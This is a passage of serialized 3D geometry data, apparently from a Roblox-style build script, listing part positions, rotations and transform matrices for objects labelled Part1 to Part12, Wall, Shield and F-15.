- ..'052.0859,-208.7604|-52.5603,12052.0849,-215.7604|-52.5603,12052.0849,-221.7564|-52.5603,12052.0859,-219.7604|-52.5603,12052.0859,-223.7604|-52.5603,12052.0849,-217.7604|-53.0603,12052.0859,-225.2604|-34.5603,12052.0869,-210.7602|-34.5603,12052.0869,-206.7602|-34.5603,12052.0869,-212.7602|-43.5607,12078.5888,-195.4601|89.8799,90.11,-89.89|22,0.4,39|-34.5603,12052.0869,-195.7602|-34.5603,12052.0859,-201.7563|-34.5603,12052.0869,-199.7602|-34.0603,12052.0869,-205.2602|-34.5603,12052.0869,-203.7602|-33.0604,12052.0869,-205.2604|10,0,0,0,0,1,0,1,0,-1,-0,-0|10.5,121.5,5.6008,-1,0,0,-0.0001,0,-1,-0.0001,-1,-0.0001|-52.5603,12052.0859,-199.7604|-43.5602,12046.5878,-205.2602|-52.5603,12052.0849,-197.7604|-52.5603,12052.0849,-195.7604|-52.5603,12052.0849,-201.7564|-52.5603,12052.0859,-203.7604|-53.0604,12052.0859,-205.2604|-34.5603,12052.0869,-197.7602|Part11|-42.1363,12051.6269,-194.7602|-60,-90,180|1,3,2|0.1,1,0.8799|1,0.6,0|Part1|-43.3104,12052.5937,-194.7602|Part2|-43.8104,12052.5937,-194.7602|Part5|-44.9844,12050.5576,-194.7602|60,90,0|Part3|-44.7344,12052.0595,-194.7602|60,-90,180|Part7|-43.8103,12049.5888,-194.7602|Part10|-42.1362,12050.5576,-194.7602|60,-90,0|Part8|-43.3103,12049.5888,-194.7602|Part6|-44.7344,12050.122,-194.7602|-60,-90,0|Part9|-42.3737,12050.1435,-194.7602|-60,90,0|Part4|-44.9844,12051.6259,-194.7602|-60,90,-180|Part12|-42.3863,12052.0595,-194.7602|60,90,-180|Wall|-40.0604,12052.5888,-194.7602|1,5,3|0,-2.5,0,1,0,0,-0,-0,-1,0,1,0|0,-21.5001,3.4996,-1,-0.0001,-0.0001,-0.0001,0,0.9999,-0.0001,0.9999,-0.0001|Actuall Frame|-40.5291,12049.3388,-194.7602|30,90,0|1,4,1|0.8999,1.1,1|-47.0603,12049.5878,-194.7602|-47.0604,12052.5878,-194.7602|0,-21.5003,-3.5004,1,0,-0.0001,0,-0.0001,0.9999,0,-1,-0.0001|-40.0603,12049.5888,-194.7602|-43.5602,12047.5878,-194.7602|89.97,90.05,0|0.8999,1.6,1|-46.5914,12049.3388,-194.7602|30,-90,0|Shield|0.3843,0.1'
- ..'45,0.8196|-43.5603,12051.0878,-194.7602|-89.9701,-89.95,90|8,5,8|1,0,1|-40.5293,12052.8437,-194.7602|-30,90,0|-43.5604,12054.5888,-194.7602|-89.9701,-89.95,0|-46.5915,12052.8437,-194.7602|-30,-90,0|23.4396,12072.4853,-195.4603|90,180,0|111,0.4,51|-35.0602,12072.5869,-194.7602|1,51,7|-43.5601,12076.5888,-194.7602|1,43,10|-43.5604,12059.3857,-473.2603|-43.5604,12046.1855,-473.2603|-0.5,-6.4,-31.5,-1,-0,-0,0,0,1,0,1,0|-18,-6.4,31.5,-0,-1,-0,0,0,1,-1,-0,-0|-0.5,-6.4,-31.5,1,0,0,0,0,1,-0,-1,-0|F-15|-43.5717,12046.6728,-477.221|0.0099,0.0299,0|-3,0.6,11.5,-1,-0.0001,-0.0001,0,0,-1,-0.0001,-1,0|-3.0001,1.9999,6.4999,-1,-0.0001,0,0,0,-1,-0.0001,-1,0|3,1.6,-0.5,1,0,-0.0001,0,0,-1,0,1,0|-43.5747,12047.874,-482.2208|-0.0366,-0.0156,0.0149|-36.5666,12048.6718,-468.7249|-0.0296,0.0069,0.0099|-50.5666,12048.6718,-468.7165|-0.0296,0.0049,0.0173|-0.5,0.6,-0.0001,-0.0001,-1,0,0,0,-1,1,0,-0.0001|-54.5654,12048.6718,-466.7141|-0.0286,0.0076,0.0194|-31.5655,12048.6718,-466.7278|-0.0286,0.0108,0.0073|-43.5747,12047.4736,-482.2208|-0.0366,-0.0156,0.0155|0,0,-7.5,1,0,-0.0001,0,1,0,-0.0001,0,1|0,-0.2,0,-1,-0.0001,0,-0.0001,0,1,0,1,0|-39.0595,12054.0703,-456.7227|-0.01,-179.9701,-180|-0.0241,0.0257,0.0026|0,3.2,0,-1,-0,-0,0,0,1,0,1,0|0,0.3999,-10,1,-0.0001,0,-0.0001,0,-1,-0.0001,1,0|0,-0.0001,1,1,-0.0001,0,0,-1,0,-0.0001,0,-1|-39.0625,12054.0712,-461.7227|-0.0267,0.0177,0.0026|0,0,-1,1,0,-0.0001,0,1,0,-0.0001,0,1|-3.5,-3.0001,-0.5,0,-1,-0.0001,0,0,1,-1,0,-0.0001|0,0.3999,-5,-1,0,0,0,0,-1,0,-1,0|-39.0604,12054.0712,-458.2227|-0.0249,0.0233,0.0026|0,0.3999,-8.5,-1,0,0,0,0,-1,0,-1,0|-3.5,3,0.5,0,-1,-0.0001,-0.0001,-0.0001,-1,1,0,0|-45.5615,12049.4707,-460.0194|90,0.0299,0|-0.0252,0.0195,0.0134|0,-2.2001,0,1,0,0,-0,-0,-1,0,1,0|-0.5,0,-0.0001,0,0,1,0,-1,0,1,-0.0001,0|-0.0001,-0.2001,-0.0001,-1,0,-0.0001,0,0,1,-0.0001,1,0|-35.5601,12050.5703,-457.7252|-0.01,-179.9701,-90|-0.0241,'
- ..'0.0246,0.0064|-0.5,0.0999,-9.0001,-0.0001,-0.0001,1,1,0,-0.0001,0,1,-0.0001|-0.0001,-0.0001,0.5,1,0,0,-0.0001,-1,0,0,0,-1|-29.9636,12050.5712,-463.7286|-0.0273,0.0158,0.0034|-48.0594,12054.0703,-456.7174|-0.0241,0.0245,0.0074|0,0.3999,9.9999,-1,0,-0.0001,-0.0001,0,-1,0,-1,0|0,-0.0001,0.9999,1,-0.0001,0,-0.0001,-1,0,-0.0001,0,-1|-35.5607,12050.5712,-458.7252|0.0099,0.0299,-90|-0.0246,0.023,0.0064|0,-0.0001,2,-1,-0.0001,0,0,1,0,0,-0.0001,-1|-39.0654,12050.4716,-466.7232|-0.01,-179.9701,0|-0.0288,0.0098,0.0084|0.0999,-3,-5.5,0,-1,-0.0001,0,0,1,-1,0,-0.0001|-35.5622,12050.5712,-461.2252|-0.0259,0.019,0.0064|-32.5645,12050.5712,-465.227|-0.0281,0.0131,0.0048|-0.0001,2.5999,0.4999,1,-0.0001,0,0,-1,0,0,0,-1|-0.0001,0,4,-1,-0.0001,0,0,1,0,0,-0.0001,-1|-0.5001,0.0999,-1.5001,0,0,1,-1,0,-0.0001,0,-1,-0.0001|-32.5675,12050.5722,-470.227|-0.0307,0.0051,0.0048|-0.5,0.0999,3.4999,0,0,1,-1,0,-0.0001,0,-1,-0.0001|-45.56,12049.4707,-457.6194|-0.0239,0.0234,0.0134|-41.5631,12049.4707,-462.7218|0,90.0299,0.0099|-0.0266,0.0158,0.0113|-48.0604,12054.0712,-458.2174|-0.0249,0.0221,0.0074|3.4999,2.9999,0.5,0,1,0,-0.0001,-0.0001,-1,-1,0,-0.0001|-36.5669,12049.4716,-469.2248|0,-89.9701,179.99|-0.03,0.0061,0.0087|-0.0001,0.1999,-0.5,-0.0001,-1,-0.0001,0,-0.0001,-1,1,0,0|0.4999,-4,1,0,0,-1,0,-1,0,-1,0,0|-40.5648,12049.4716,-465.7224|-0.0282,0.0111,0.0108|0,-0.6001,0,-1,0,-0.0001,0,0,1,-0.0001,1,0|0.4999,-1,-1,0,0,-1,0,-1,0,-1,0,0|0.5,0,1,-0.0001,0,-1,0,-1,0,-1,-0.0001,-0.0001|-41.5615,12049.4707,-460.0218|-0.0252,0.0201,0.0113|0.5,-1.0001,-6.7001,-0.0001,0,-1,1,0,0,0,-1,0|-41.56,12049.4707,-457.6218|-0.0239,0.0239,0.0113|0.5,-1,-9.1001,-0.0001,0,-1,1,0,0,0,-1,0|0,2.2,-0.0001,1,-0.0001,0,-0.0001,0,-1,0,1,0|-31.5658,12049.4716,-467.2277|-0.0289,0.01,0.006|0,0.1999,-0.5,-0.0001,-1,-0.0001,0,-0.0001,-1,1,0,0|0.4999,0.9999,3,0,0,-1,0,-1,0,-1,0,0|-45.5631,12049.4707,-462.7193|-0.026'
- ..'6,0.0152,0.0134|2,0.2,-7.5,1,-0.0001,-0.0001,-0.0001,1,0,-0.0001,0,1|-40.5678,12048.872,-470.7225|-0.0307,0.0032,0.0117|-0.0001,-0.4,3.5,-1,0,-0.0001,-0.0001,1,0,-0.0001,0,-1|0.4999,-1.6001,4,0,0,-1,0,-1,0,-1,0,0|-48.0625,12054.0712,-461.7174|-0.0267,0.0165,0.0074|0,0.3999,4.9999,1,-0.0001,-0.0001,0,0,-1,-0.0001,1,0|-51.5601,12050.5703,-457.7157|-0.01,-179.9701,90|-0.0241,0.0224,0.0148|-40.5649,12047.4716,-465.7226|-0.0279,0.0111,0.014|-0.0001,1.3999,-2.5001,1,-0.0001,0,-0.0001,1,0,0,0,1|0.5,-2,0.9999,-0.0001,0,-1,-0.0001,-1,0,-1,-0.0001,-0.0001|-51.5607,12050.5712,-458.7157|-0.0246,0.0208,0.0148|-0.0001,-0.0001,0.5,1,-0.0001,0,-0.0001,-1,-0.0001,0,-0.0001,-1|-46.5649,12047.4716,-465.719|-0.0279,0.0103,0.0171|-3.0001,0.2,11.5,-1,0,-0.0001,-0.0001,0,-1,0,-1,0|-0.0001,1.3999,-0.0001,1,0,0,-0.0001,0,-1,0,1,0|0.4999,-2,-1.0001,-0.0001,0,-1,-0.0001,-1,0,-1,-0.0001,-0.0001|-43.5678,12047.4716,-470.7208|-0.0305,0.0027,0.0155|0.5,-2.0001,-2,0,0,-1,0,1,0,1,0,-0.0001|-4.0001,0.1999,1.5,-0.0001,0,1,0,-1,0,1,-0.0001,-0.0001|0.9999,1,6,-0.0001,-0.0001,-1,0,-1,-0.0001,-1,0,-0.0001|0.5,-2.0001,2,0,0,-1,0,1,0,1,-0.0001,-0.0001|4,0.2,1.5,0,0,-1,0,-1,0,-1,0,0|0,-1.6,0,1,0,0,-0.0001,0,1,-0.0001,-1,0|-43.5678,12049.2714,-470.7205|-0.0308,0.0027,0.0127|0.4999,-0.2001,-2,0,0,-1,0,1,0,1,0,-0.0001|0.9999,-0.8,6.0001,-0.0001,-0.0001,-1,0,-1,-0.0001,-1,0,-0.0001|-46.5648,12049.4716,-465.7189|-0.0282,0.0103,0.0139|-1,0,0,-0,-0,-1,0,1,0,1,0,0|0.5,-1,0.9999,0,-0.0001,-1,0,-1,0,-1,0,0|0.5,-0.0001,-1,-0.0001,0,-1,-0.0001,-1,0,-1,0,-0.0001|-51.5621,12050.5712,-461.2157|0.0099,0.0299,90|-0.0259,0.0168,0.0148|-0.5,0.1,5.4999,0,-0.0001,1,1,0,0,0,1,-0.0001|-0.0001,-0.0001,0.5,-1,-0.0001,0,-0.0001,1,0,0,-0.0001,-1|-0.5,-3.5,0.4999,0,-0.0001,1,1,0,-0.0001,0,1,-0.0001|-48.0654,12050.4716,-466.7178|-0.0288,0.0085,0.0131|-2.0001,-9.1001,-1,0,0,1,-1,0,-0.0001,0,-1,-0.0001|-2,-6.7001,-1,0,0,'
- ..'1,-1,0,-0.0001,0,-1,-0.0001|-0.1001,2.9999,8.9999,0,1,-0.0001,-0.0001,0,-1,-1,0,-0.0001|-0.0001,-3.2,-8.5,-1,-0.0001,-0.0001,-0.0001,0,1,0,1,0|-0.1,-6,3.5,0,1,-0.0001,0,-0.0001,1,1,0,0|-1,0,9.9999,0,0,1,0,1,0,-1,0,-0.0001|-40.5714,12048.4726,-476.7226|0.0099,0.0299,180|-0.0338,-0.0064,0.0124|-40.5714,12050.4726,-476.7223|-0.0341,-0.0064,0.0092|0.5,-0.0001,10,-0.0001,-0.0001,-1,0,1,0,1,0,0|-0.0001,-1.6,2.5,1,0,-0.0001,-0.0001,-1,0,0,0,-1|0,-1.6,0,-1,0,0,-0.0001,0,1,-0.0001,1,0|-46.5678,12048.872,-470.7189|-0.0307,0.0023,0.0149|0,-1.4,2.5,-1,-0.0001,-0.0001,0,1,0,-0.0001,0,-1|-3,0.1999,6.5,-1,0,-0.0001,-0.0001,0,-1,0,-1,0|0,-1.6001,3.5,1,-0.0001,0,0,-1,0,-0.0001,0,-1|0.5,-1.6001,-4,0,-0.0001,-1,0,-1,-0.0001,-1,0,0|-50.5669,12049.4716,-469.2165|-0.03,0.0041,0.016|-43.5726,12049.6728,-478.7206|0,-89.9701,-0.01|-0.035,-0.01,0.012|3.4999,-0.8,0.5,-1,0,-0.0001,0,1,0,-0.0001,0,-1|-3.5,-0.8,0.5,-1,0,-0.0001,0,1,0,-0.0001,-0.0001,-1|-54.5645,12050.5712,-465.2139|-0.028,0.01,0.0164|-0.5,0.0999,1.5,-0.0001,0,1,-1,0,0,0,-1,-0.0001|-0.0001,-0.0001,3.9999,-1,0,0,0,1,-0.0001,0,0,-1|-0.0001,2.6,0.5,1,0,0,0,-1,-0.0001,0,-0.0001,-1|-57.1636,12050.5712,-463.7124|-0.0273,0.012,0.0177|-42.0747,12050.4736,-482.2214|-0.037,-0.0154,0.01|0,0.7999,0,-0.0001,-1,0,0,0,-1,1,0,0|1,-2,-5.5,-0.0001,0,-1,0,-1,0,-1,0,-0.0001|3.5,0.9999,-1,1,0,0,0,1,0,0,0,1|-46.5714,12050.4726,-476.7186|-0.0341,-0.0073,0.0123|-42.0747,12047.6728,-482.2217|-0.0366,-0.0154,0.0144|0.9999,0.8,-5.5,0,0,-1,0,1,-0.0001,1,0,-0.0001|-42.0747,12048.873,-482.2216|-0.0368,-0.0154,0.0125|-0.0001,-0.4,0,0,-1,0,0,0,1,-1,0,-0.0001|1,-0.4,-5.5,-0.0001,0,-1,0,-1,0,-1,0,-0.0001|-54.5657,12049.4716,-467.2141|-0.0289,0.0068,0.0181|0,0.2,-0.5001,-0.0001,-1,-0.0001,0,-0.0001,-1,1,0,0|-0.5,0,3,0,-0.0001,1,-0.0001,1,0,-1,0,0|-46.5714,12048.4726,-476.719|-0.0338,-0.0073,0.0155|2,-0.8,6,0,0,-1,0,-1,0,-1,0,0|-3,0.2,0.4999,1,-0.0'
- ..'001,-0.0001,0,0,-1,-0.0001,1,0|5.4999,-0.8001,-0.5001,1,0,-0.0001,0,1,-0.0001,-0.0001,0,1|-5.5,-2,-0.5,-1,0,0,0,-1,0,-0.0001,-0.0001,1|-2.0001,1,-6.0001,-0.0001,-0.0001,1,0,-1,0,1,0,-0.0001|0,-0.4,-0.0001,-1,-0.0001,0,-0.0001,0,1,0,1,0|-54.5675,12050.5722,-470.2139|-0.0307,0.002,0.0164|1,-0.6,4,-1,-0.0001,0,0,-0.0001,1,0,1,0|-45.0747,12050.4736,-482.2196|-0.037,-0.0158,0.0115|3.5,0.9999,1,-1,0,-0.0001,0,1,-0.0001,-0.0001,-0.0001,-1|-45.0747,12047.6728,-482.2199|0,90.0299,-179.9901|-0.0366,-0.0158,0.016|-45.0747,12048.873,-482.2198|-0.0368,-0.0158,0.0141|0,-0.4,-0.0001,-0.0001,1,0,-0.0001,0,1,1,-0.0001,-0.0001|-1,-0.4,-5.5,0,-0.0001,1,0,-1,0,1,0,0|0,-0.8,-0.0001,-0.0001,-1,0,0,0,1,-1,-0.0001,0|-43.5747,12051.2734,-482.2204|-0.0371,-0.0156,0.0095|-0.0001,0.7999,0.5,-1,0,-0.0001,0,1,0,-0.0001,-0.0001,-1|0,0.7999,0.5,-1,0,-0.0001,0,1,-0.0001,-0.0001,0,-1|-43.5768,12049.4736,-485.7207|-0.0387,-0.0212,0.0124|-56.0604,12049.4853,-475.7603|0,-180,0|0,-0.6,-1.5,-1,-0.0001,0,-0.0001,-0.0001,1,0,0.9999,-0.0001|-58.0604,12049.4853,-476.7603|-56.0584,12049.1904,-474.7601|-0.01,90,0|-56.0604,12049.4853,-478.7603|0,-0.6,1.5,-1,-0.0001,0,-0.0001,-0.0001,1,0,0.9999,-0.0001|-54.0604,12049.4853,-476.7603|-2.0001,-0.6001,-0.5001,-0.0001,0.9999,-0.0001,0,0,1,0.9999,0,-0.0001|-56.0604,12053.0859,-477.2603|-0.5001,3,-2,0,-1,0,-0.0001,-0.0001,-1,0.9999,0,-0.0001|-34.5601,12052.0859,-440.7602|-52.5601,12052.0849,-440.7604|-61.5604,12052.7851,-441.7603|-31.5,-0.2,-18,-0,1,-0,0,0,1,1,0,0|-25.0604,12052.7851,-441.7603|-31.5,-0.2,18.5,-0,1,-0,0,0,1,1,0,0|-31.5,0.1999,18.5,0,1,0,-0,-0,-1,-1,-0,-0|-75.0604,12052.7851,-472.7603|-0.5,-0.2,-31.5,1,0,-0,0,0,1,0,-1,0|-12.0604,12052.7851,-473.7603|0.5,-0.2,31.5,-1,-0,-0,0,0,1,0,1,0|-34.0601,12052.0859,-431.2602|-33.0601,12052.0859,-431.2603|-34.5601,12052.0859,-434.7602|-34.5602,12057.5908,-431.2602|-34.5601,12052.0859,-432.7602|-34.56'
- ..'01,12052.0859,-436.7602|-34.5601,12052.0859,-438.7602|-52.5601,12052.0849,-434.7604|-52.5601,12052.0849,-432.7604|-52.5602,12057.5878,-431.2603|-52.5601,12052.0849,-436.7604|-52.5601,12052.0849,-438.7604|-167.0604,12052.8857,-443.7603|0.5,-0.2,31.5,-1,0,-0,0,0,1,-0,1,-0|-124.5603,12058.5859,-410.2604|-124.5602,12052.0849,-420.7603|-123.0601,12052.0839,-419.2603|-124.5601,12052.0839,-419.7603|-124.5602,12057.5888,-419.2603|-126.0601,12052.0839,-419.2603|-128.0601,12052.0839,-419.2603|-132.0601,12052.0839,-419.2603|-130.0601,12052.0839,-419.2603|-134.0601,12052.0839,-419.2603|-135.0604,12052.8857,-430.7603|-31.5,-0.2,18.5,0,1,-0,0,0,1,1,0,-0|46.9399,12052.0888,-419.2602|46.9396,12052.0878,-401.2602|44.9396,12052.0878,-401.2602|47.9396,12052.8857,-430.2603|42.9399,12052.0888,-419.2602|44.9399,12052.0888,-419.2602|40.9437,12052.0878,-401.2602|42.9396,12052.0878,-401.2602|37.4398,12057.5927,-419.2602|40.9438,12052.0878,-419.2602|33.9399,12052.0888,-419.2602|35.9399,12052.0888,-419.2602|31.9399,12052.0878,-419.2602|38.9399,12052.0888,-419.2602|37.4399,12052.0888,-419.7602|37.4398,12052.0888,-420.7602|35.9398,12052.0878,-401.2602|37.4396,12052.0878,-400.7602|37.4396,12057.5908,-401.2602|33.9398,12052.0878,-401.2602|37.4396,12058.5908,-410.2602|37.44,12046.5898,-410.2602|31.9398,12052.0878,-401.2602|37.4398,12052.0878,-399.7602|38.9396,12052.0878,-401.2602|26.9399,12052.0878,-419.2602|22.9399,12052.0878,-419.2602|24.9399,12052.0878,-419.2602|29.9399,12052.0878,-419.2602|27.9399,12052.0878,-419.2602|20.9438,12052.0878,-419.2602|18.9399,12052.0878,-419.2602|22.9396,12052.0878,-401.2602|20.9437,12052.0869,-401.2602|26.9396,12052.0878,-401.2602|18.9396,12052.0878,-401.2602|29.9398,12052.0878,-401.2602|17.4396,12057.5898,-401.2602|24.9396,12052.0878,-401.2602|27.9398,12052.0878,-401.2602|17.4398,12052.0878,-420.7602|15.9399,12052.0878,-419.2602|17.4398,12057.591'
- ..'7,-419.2602|17.4399,12052.0878,-419.7602|17.4396,12052.0878,-400.7602|17.4398,12052.0878,-399.7602|15.9398,12052.0878,-401.2602|17.44,12046.5898,-410.2602|17.4396,12058.5898,-410.2602|13.9399,12052.0878,-419.2602|11.9399,12052.0878,-419.2602|11.9398,12052.0878,-401.2602|13.9398,12052.0878,-401.2602|2.9399,12052.0878,-419.2602|4.9399,12052.0878,-419.2602|7.9399,12052.0878,-419.2602|6.9399,12052.0878,-419.2602|9.9399,12052.0878,-419.2602|0.9437,12052.0869,-401.2602|6.9396,12052.0869,-401.2602|9.9398,12052.0878,-401.2602|4.9396,12052.0869,-401.2602|2.9396,12052.0869,-401.2602|7.9397,12052.0878,-401.2602|-1.0601,12052.0878,-419.2602|-2.5602,12057.5917,-419.2602|0.9438,12052.0869,-419.2602|-2.5601,12052.0869,-419.7602|-2.5602,12052.0878,-420.7602|-4.0601,12052.0869,-419.2602|-4.0603,12052.0869,-401.2602|-1.0604,12052.0869,-401.2602|-2.5604,12052.0869,-400.7602|-2.5604,12058.5898,-410.2602|-2.5602,12052.0869,-399.7602|-2.5604,12057.5898,-401.2602|-2.56,12046.5888,-410.2602|-8.0601,12052.0869,-419.2602|-6.0601,12052.0869,-419.2602|-8.0602,12052.0869,-401.2602|-6.0602,12052.0869,-401.2602|-10.0601,12052.0869,-419.2602|-10.0602,12052.0869,-401.2602|-12.0601,12052.0869,-419.2602|-12.0602,12052.0869,-401.2602|-13.0601,12052.0869,-401.2602|-15.0601,12052.0869,-401.2602|-17.0601,12052.0869,-401.2602|-21.0601,12052.0869,-401.2602|-19.0601,12052.0869,-401.2602|-19.06,12052.0859,-419.2602|-21.06,12052.0859,-419.2602|-17.06,12052.0859,-419.2602|-15.06,12052.0859,-419.2602|-13.06,12052.0859,-419.2602|-22.5604,12057.5917,-401.2602|-22.56,12052.0859,-399.7602|-22.56,12046.5869,-410.2602|-24.0601,12052.0859,-401.2602|-22.5601,12052.0859,-400.7602|-22.5603,12058.5888,-410.2602|-24.06,12052.0859,-419.2602|-22.56,12052.0859,-420.7602|-22.5602,12057.5888,-419.2602|-22.56,12052.0859,-419.7602|-28.06,12052.0859,-419.2602|-30.06,12052.0849,-419.2602|-26.064,12052.0849,-419.260'
- ..'2|-26.0642,12052.0859,-401.2602|-28.0601,12052.0859,-401.2602|-30.0601,12052.0859,-401.2602|-32.06,12052.0849,-419.2602|-32.0601,12052.0859,-401.2602|-34.5601,12052.0859,-398.7602|-34.0601,12052.5859,-400.7602|-34.0599,12052.5849,-419.7602|-34.5601,12052.0859,-421.7602|-34.5601,12052.0859,-423.7602|-34.5601,12052.0859,-425.7602|-34.5601,12052.0859,-429.7602|-34.5601,12052.0849,-427.7562|-43.5603,12058.5888,-420.2602|-43.5599,12046.5869,-430.7602|-53.56,12046.5859,-410.2603|-55.0601,12052.0859,-401.2603|-64.5603,12058.5878,-410.2603|-66.0601,12052.0849,-401.2603|-64.5601,12052.0849,-400.7603|-68.0642,12052.0849,-401.2603|-57.0601,12052.0859,-401.2603|-59.0601,12052.0849,-401.2603|-63.0601,12052.0849,-401.2603|-64.56,12052.0849,-399.7603|-64.5604,12057.5898,-401.2603|-61.0601,12052.0849,-401.2603|-70.0601,12052.0849,-401.2603|-72.0601,12052.0849,-401.2603|-52.5601,12052.0849,-398.7604|-53.0601,12052.5859,-400.7603|-52.5601,12052.0849,-421.7604|-53.0601,12052.5859,-419.7603|-72.06,12052.0839,-419.2602|-68.064,12052.0839,-419.2602|-70.06,12052.0839,-419.2602|-66.06,12052.0849,-419.2602|-61.06,12052.0849,-419.2603|-63.06,12052.0849,-419.2602|-64.56,12052.0849,-420.7602|-64.5602,12057.5878,-419.2603|-64.56,12052.0849,-419.7603|-59.06,12052.0849,-419.2603|-57.06,12052.0849,-419.2603|-55.06,12052.0849,-419.2603|-52.5601,12052.0849,-423.7604|-52.5601,12052.0849,-427.7564|-52.5601,12052.0849,-425.7604|-52.5601,12052.0849,-429.7604|-54.0601,12052.0849,-431.2604|-53.0601,12052.0849,-431.2604|-75.0604,12052.0859,-401.2603|-74.0601,12052.0849,-401.2603|-74.06,12052.0839,-419.2602|-75.0601,12052.0859,-419.2603|-77.0601,12052.0859,-419.2603|-83.0604,12052.0859,-401.2603|-79.0604,12052.0859,-401.2603|-77.0604,12052.0859,-401.2603|-81.0563,12052.0849,-401.2603|-83.0601,12052.0859,-419.2603|-81.0561,12052.0849,-419.2603|-79.0601,12052.0859,-419.2603|-84.5603,12058.586'
- ..'9,-410.2603|-84.56,12046.5869,-410.2603|-84.5604,12052.0859,-399.7603|0,-180,180|-95.0602,12052.0849,-401.2604|-94.0604,12052.0859,-401.2603|-92.0604,12052.0859,-401.2603|-97.0602,12052.0849,-401.2604|-90.0604,12052.0859,-401.2603|-101.0563,12052.0839,-401.2604|-99.0602,12052.0849,-401.2604|-88.0604,12052.0859,-401.2603|-84.5604,12052.0859,-400.7603|-84.5602,12057.5869,-401.2603|-86.0604,12052.0859,-401.2603|-84.5602,12057.5898,-419.2603|-84.5601,12052.0849,-419.7603|-84.5604,12052.0859,-420.7603|-90.0601,12052.0849,-419.2603|-86.0601,12052.0849,-419.2603|-88.0601,12052.0849,-419.2603|-94.0601,12052.0849,-419.2603|-92.0601,12052.0849,-419.2603|-97.0601,12052.0849,-419.2603|-99.0601,12052.0849,-419.2603|-95.0601,12052.0849,-419.2603|-101.0561,12052.0839,-419.2603|-104.56,12046.5869,-410.2603|-104.5603,12058.5869,-410.2603|-106.0602,12052.0849,-401.2604|-104.5602,12052.0849,-400.7603|-104.5602,12052.0849,-399.7604|-103.0602,12052.0849,-401.2604|-104.5602,12057.5869,-401.2603|-103.0601,12052.0849,-419.2603|-104.5602,12057.5888,-419.2603|-106.0601,12052.0849,-419.2603|-104.5601,12052.0849,-419.7603|-104.5604,12052.0859,-420.7603|-108.0602,12052.0849,-401.2604|-108.0601,12052.0849,-419.2603|-115.0602,12052.0839,-401.2604|-121.0563,12052.0839,-401.2604|-112.0602,12052.0849,-401.2604|-119.0602,12052.0839,-401.2604|-117.0602,12052.0839,-401.2604|-114.0602,12052.0849,-401.2604|-110.0602,12052.0849,-401.2604|-110.0601,12052.0849,-419.2603|-112.0601,12052.0849,-419.2603|-115.0601,12052.0849,-419.2603|-114.0601,12052.0849,-419.2603|-117.0601,12052.0849,-419.2603|-119.0601,12052.0849,-419.2603|-121.0561,12052.0839,-419.2603|-166.5604,12046.2851,-412.2603|18.5,-6.4,31.5,0,-1,0,0,0,1,-1,0,-0|-0.5,-6.4,-31.5,1,0,0,0,0,1,0,-1,0|-0.5,-6.4,-31.5,-1,0,-0,0,0,1,-0,1,-0|-124.56,12046.5859,-410.2604|-123.0602,12052.0839,-401.2604|-128.0602,12052.0839,-401.2604|-126.0602,1'
- ..'2052.0839,-401.2604|-124.5602,12052.0839,-399.7604|-134.0602,12052.0839,-401.2604|-132.0602,12052.0839,-401.2604|-124.5602,12052.0839,-400.7604|-130.0602,12052.0839,-401.2604|-124.5602,12057.5859,-401.2604|-164.1075,12049.499,-399.7708|0.0099,-90.03,0|-165.1087,12049.499,-397.7714|0,-0.03,0.0099|-163.1072,12049.2041,-399.7721|-0.01,179.97,-0.01|-167.1075,12049.499,-399.7725|-165.1063,12049.499,-401.7714|-165.608,12053.0986,-399.7715|-0.5001,3,-1.9999,0,-1,0,-0.0001,-0.0001,-1,0.9999,0,-0.0001|-0.5001,3,2.0001,0,-1,0,-0.0001,-0.0001,-1,0.9999,0,-0.0001|0,3,-1.5001,0.9999,0,-0.0001,0,-0.0001,-1,0,0.9999,0|0,3,1.4999,0.9999,0,-0.0001,0,-0.0001,-1,0,0.9999,0|-166.5604,12059.4853,-412.2603|-165.5604,12046.6855,-412.2603|-170.5604,12047.8857,-412.2603|-0.034,-0.0084,0.0175|-157.0604,12048.6855,-419.2603|-0.0378,-0.0176,0.0092|-157.0604,12048.6855,-405.2603|-0.0304,0.0047,0.0092|-155.0604,12048.6855,-401.2603|-0.0283,0.0114,0.0081|-155.0604,12048.6855,-424.2603|-0.0404,-0.0253,0.0081|-170.5604,12047.4853,-412.2603|-0.0339,-0.0084,0.0182|0,0,-7.5,1,0,0,0,1,0,0,0,1|-145.0604,12054.0849,-416.7603|-0.0372,-0.0119,-0.0058|0,0.3999,-10,1,0,0,0,0,-1,0,1,0|-150.0604,12054.0849,-416.7603|-0.0372,-0.0126,-0.0031|-3.5,-3,-0.5,0,-1,0,0,0,1,-1,0,0|-146.5604,12054.0849,-416.7603|-0.0372,-0.0121,-0.005|-3.5,3,0.5,0,-1,0,0,0,-1,1,0,0|-148.3604,12049.4853,-410.2603|90,90,0|-0.0332,-0.002,0.0033|-0.5001,0,0,0,0,1,0,-1,0,1,0,0|-146.0604,12050.5849,-420.2603|-0.0386,-0.0176,0.0003|0,0,0.5,1,0,-0,0,-1,-0,0,0,-1|-152.0604,12050.5849,-425.8603|-0.0415,-0.0274,0.0035|-145.0604,12054.0849,-407.7603|-0.0325,0.0025,-0.0058|-147.0604,12050.5849,-420.2603|-0.0386,-0.0178,0.0009|0,0,2,-1,0,-0,0,1,0,0,0,-1|-155.0604,12050.4853,-416.7603|-0.0367,-0.0133,0.0052|2,-6.7001,-1.0001,0,0,-1,1,0,0,0,-1,0|0.0999,3,9,0,-1,0,0,0,-1,1,0,0|0.0999,-6,-1.5,-0,-1,0,-0,0,1,-1,0,0|0.0999,-3,-5.5,-0,-1,0,'
- ..'-0,0,1,-1,0,0|2,-9.1,-1.0001,0,0,-1,1,0,0,0,-1,0|1,-1.0001,1,0,0,-1,0,-1,0,-1,0,0|0.0999,-6,3.5,-0,-1,0,-0,0,1,-1,0,0|1,0,10,0,0,-1,0,1,0,1,0,0|-149.5604,12050.5849,-420.2603|-0.0386,-0.0181,0.0022|-153.5604,12050.5849,-423.2603|-0.0401,-0.0235,0.0043|0,0,4,-1,0,-0,0,1,0,0,0,-1|-158.5604,12050.5849,-423.2603|-0.0401,-0.0242,0.0069|-145.9604,12049.4853,-410.2603|-0.0332,-0.0017,0.002|0,2.1999,0,1,0,0,0,0,-1,0,1,0|-151.0604,12049.4853,-414.2603|-0.0353,-0.0088,0.0047|2,1.9999,7.5,-1,0,0,0,1,0,0,0,-1|-1,-2,-2.5,-1,0,0,0,-1,0,0,0,1|0,-2.2001,0,1,0,0,0,0,1,0,-1,0|-146.5604,12054.0849,-407.7603|-0.0325,0.0022,-0.005|3.4999,3,0.5,0,1,0,0,0,-1,-1,0,0|0,0.3999,8.5,1,0,0,0,0,-1,0,1,0|0,0,2.5,-1,0,0,